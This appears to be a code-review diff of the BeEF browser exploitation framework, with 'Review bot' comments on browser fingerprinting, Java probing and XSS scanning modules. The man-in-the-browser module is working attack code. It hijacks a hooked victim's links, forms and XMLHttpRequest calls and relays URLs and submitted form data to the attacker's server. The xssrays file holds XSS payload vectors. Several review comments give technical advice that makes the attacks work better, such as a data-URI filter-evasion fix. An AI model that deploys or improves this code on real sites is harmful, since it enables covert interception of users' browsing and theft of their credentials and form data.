return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
},
/**
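Review bot: each Firefox release now costs three edits (a new `isFFnn` function, a term appended to the `isFF` chain, and the entries in the version map and `getVersion` further down); parsing the major version once from the existing `Firefox\/(\d+)\.` pattern and comparing numbers would make `isFF` a single test and let `isFF11`/`isFF12` disappear.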
@@ -286,12 +300,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
},
/**
* Returns true if Chrome 17.
* @example: beef.browser.isC17()
*/
isC17: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
},
/**
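Review bot: `isC17` copies the pattern from `isC16`, including dereferencing `window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1]` without checking that the match succeeded; on a browser that sets `window.chrome` but whose appVersion lacks a `Chrome/nn.` token this throws a TypeError inside the hook. Capture the match once, guard for `null`, and compare the parsed number, which also collapses the per-version functions into one.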
@@ -355,6 +377,7 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
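Review bot: the comment on `C17: this.isC17(), // Chrome 16` should read `// Chrome 17`.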
@@ -368,6 +391,8 @@ beef.browser = {
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -408,6 +433,7 @@ beef.browser = {
if (this.isC14()) { return '14' }; // Chrome 14
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isFF2()) { return '2' }; // Firefox 2
@@ -421,7 +447,8 @@ beef.browser = {
if (this.isFF8()) { return '8' }; // Firefox 8
if (this.isFF9()) { return '9' }; // Firefox 9
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -482,7 +509,19 @@ beef.browser = {
return flash_installed;
}
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function() {
return (!!window.navigator.javaEnabled());
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
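Review bot: `return (!!window.navigator.javaEnabled());` calls the method unconditionally; on a browser where `navigator.javaEnabled` is absent this throws, and because it runs during hook initialization it takes the hook down with it (the commit log in this series already records `javaEnabled()` breaking the hook in IE6). Guard it: `return typeof navigator.javaEnabled === 'function' && !!navigator.javaEnabled();`.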
@@ -490,9 +529,34 @@ beef.browser = {
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function() {
if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch(e) {
return false;
}
return false;
},
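Review bot: `return output = 1;` is an assignment, not a comparison, so `hasJava()` returns `1` whenever the applet call does not throw, regardless of what `getInfo()` returned; it should be `return output == 1;` (or `=== 1` if the applet returns a number). Also `applet_id` and `applet_name` are assigned but never used (the literal `'checkJava'` is passed instead), the `return false;` after the `try`/`catch` is unreachable, and the early `return true;` for Chrome and Safari means those browsers report Java as working on the strength of `navigator.javaEnabled()` alone; the inline comment admits this, so the known gap belongs in the commit message too.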
@@ -564,8 +628,7 @@ beef.browser = {
'control':'ShockwaveFlash.ShockwaveFlash',
'return': function(control) {
version = control.getVariable('$version').substring(4);
version = version.split(',');
return 'Flash Player v'+parseFloat(version[0]+'.'+version[1]);
return 'Flash Player v'+version.replace(/,/g, ".");
}},
'Quicktime':{
'control': 'QuickTime.QuickTime',
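Review bot: `version = control.getVariable('$version').substring(4);` assigns `version` without `var`, leaking a global from inside the ActiveX probe; declare it locally. The new `version.replace(/,/g, ".")` returns the full `major.minor.build.patch` string instead of the old `parseFloat` value, which is the intended build-version fix, but any caller that still treats the result as a number needs checking.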
@@ -665,12 +728,10 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
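Review bot: switching `java_enabled` from `beef.browser.hasJava()` to `beef.browser.javaEnabled()` changes what the `JavaEnabled` detail means. `hasJava()` probes with the checkJava applet, `javaEnabled()` only consults `navigator.javaEnabled()`, which is true when the plugin is installed but blocked or click-to-play. Either note the weaker semantics where the field is documented or keep the applet probe on the browsers where it works. Also, `internal_ip` and `internal_hostname` a few lines above depend on `beef.net.local` having completed its own Java check first (see its `initializeSocket` change in this same commit), so the order of these calls matters and should be stated.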
@@ -691,12 +752,10 @@ beef.browser = {
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(system_platform) details['SystemPlatform'] = system_platform;
if(internal_ip) details['InternalIP'] = internal_ip;
if(internal_hostname) details['InternalHostname'] = internal_hostname;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_web_socket) details['HasWebSocket'] = has_web_socket
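Review bot: only the `JavaEnabled` line gained a trailing semicolon; the `VBScriptEnabled`, `HasFlash` and `HasWebSocket` lines directly below still rely on automatic semicolon insertion. Fix all of them in the same change rather than one at a time.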

View File

@@ -1,135 +1,256 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i < lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Fetches a window.location=http://domainname.com and setting up history
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}
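Review bot: `e.preventDefault;` in `poisonAnchor` and `e.preventdefault;` in the `onsubmit` handler reference the method without calling it (the second also has the wrong case), so both are no-ops and the handlers only work because they `return false`; use `e.preventDefault();` in both. In the `XMLHttpRequest.prototype.open` override, `url.indexOf(document.location.hostname) == -1` classifies every relative URL (for example `/api/items`) as cross-domain and hands it to `window.open`, because a relative URL never contains the hostname; resolve the URL against the document (an `<a>` element's `href` gives `hostname` and `port`) before comparing, which also removes the need for the `:[0-9]+` regex. The `li` rewriting builds an inline handler by string concatenation, `"beef.mitb.fetchOnclick('" + ... + "')"`, so an `href` containing a single quote breaks out of the string, and `getElementsByTagName("a")[0]` is `undefined` for an `li` without a link; attach a closure with `addEventListener` instead. `poisonForm` neither URL-encodes `inputs[i].value` nor places the `&` correctly (it is emitted before a submit input that is then skipped and never before the last input), which corrupts the replayed POST body. Finally, `"beef"/"beef"` as username and password is used as an in-band marker for the tool's own requests; a flag on the request object set before `open` would avoid colliding with a site that really uses those credentials.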

View File

@@ -168,9 +168,22 @@ beef.net = {
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
dataType: dataType
});
}else{ //GET, HEAD, ...
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
url: url,
data: data,
timeout: (timeout * 1000),
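Review bot: the `dataType` selected through `$j.ajaxSetup` for POST requests is overridden by the explicit `dataType: 'script'` in the `$j.ajax({...})` call a few lines below, since per-call options take precedence over `ajaxSetup` defaults; the POST branch therefore still goes out as `script` and the comment about POSTs being turned into GETs is not addressed. Pass the value in the per-request options instead (`dataType: method == "POST" ? dataType : 'script'`) and drop both `ajaxSetup` calls, which as written also change the global jQuery defaults for every later request made on the hooked page.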

View File

@@ -21,6 +21,8 @@
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
@@ -29,16 +31,30 @@ beef.net.local = {
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(! beef.browser.hasJava()) return -1;
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
return 1;
},
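Review bot: `this.checkJava=True` and `this.hasJava=False` use capitalised identifiers that do not exist in JavaScript, so the first branch throws a `ReferenceError` instead of recording the result. The control flow is also inverted: `checkJava` starts as `false` and the probe only runs `if(this.checkJava)`, so the probe never executes, `hasJava` stays `false`, and the `else` branch returns -1 forever. The intended logic is presumably `if(!this.checkJava){ this.checkJava = true; this.hasJava = beef.browser.hasJava(); }` followed by the socket creation whenever `this.hasJava` is set; a test that calls `initializeSocket()` twice and expects a socket after the second call would have caught this.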
/**
@@ -47,7 +63,7 @@ beef.net.local = {
* @error: return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
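Review bot: `getLocalAddress` now checks `this.hasJava` before calling `initializeSocket()`, but `hasJava` is only ever set inside `initializeSocket()` and is initialised to `false`, so the guard returns `false` before the probe has had a chance to run. Either call `initializeSocket()` first and act on its return value, or keep the direct `beef.browser.hasJava()` check. The same ordering problem applies to `getLocalHostname` below.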
@@ -65,7 +81,7 @@ beef.net.local = {
* @error: return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -79,4 +95,4 @@ beef.net.local = {
};
beef.regCmp('beef.net.local');
beef.regCmp('beef.net.local');

View File

@@ -50,19 +50,19 @@ beef.net.xssrays = {
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
// {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
{input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
//{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
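Review bot: with the `expression()` vector commented out, no remaining entry in `vectors` carries `browser: 'IE'`, so any code that filters on that field now has nothing IE-specific to select; confirm that is intended rather than a side effect of enabling the DOM-breaker vectors. The stray `//,` after the `'Standard script injection double'` entry is leftover and should go. The newly enabled `'null\nXSS//'` vector carries a raw newline, which is harmless when the parameter is passed through `encodeURIComponent` but is sent as-is on the unencoded Chrome/Safari path added further down in this file.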
@@ -308,7 +308,10 @@ beef.net.xssrays = {
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) { // check for XSS in GET parameters
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
@@ -328,12 +331,19 @@ beef.net.xssrays = {
exploit = vector.input.replace(/XSS/g, beefCallback);
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
}
paramsPos++;
}
}
} else { // check for XSS in GET URL path
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
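Review bot: in the Chrome/Safari branch the exploit is appended to `url` without `encodeURIComponent`, on the basis that the whole URI is base64-encoded later. Base64 only protects the string while it sits inside the `data:` URI; once the browser decodes it and requests the URL, characters in the payload such as `&`, `#` and `+` are still parsed as parameter separator, fragment start and space, so the value that reaches the target is not the vector. Keep `encodeURIComponent` in both branches unless a specific vector needs raw characters, and say why in a comment where the exception is made.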
@@ -352,8 +362,9 @@ beef.net.xssrays = {
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
@@ -361,10 +372,18 @@ beef.net.xssrays = {
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
iframe.src = url;
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";
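Review bot: `iframe.src = "data:text/html;base64," + btoa(url)` does not load `url` in the frame; it renders the decoded URL string as the body of an HTML document, so on Chrome and Safari the GET ray is never sent to the target. If the intent is to keep the URL out of the browser's URL-based filtering, the data URI has to contain a document that navigates, for instance the base64 of `<iframe src="...">` or `<script>location="..."</script>` with the URL escaped for that context. `btoa` also throws on characters outside Latin-1, so a vector with such characters will abort the scan. The `printDebug` call below now logs the base64 blob rather than the URL; log `url` alongside it to keep the debug output useful.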

View File

@@ -15,208 +15,202 @@
#
module BeEF
module Core
module Core
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
end
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
get_extensions
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# Uses the API to include all the code from extensions that need to add methods, constants etc to that class.
# @todo Determine if this method is deprecated
def get_extensions
BeEF::API::Command.extended_in_modules.each do |mod|
self.class.send(:include, mod)
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
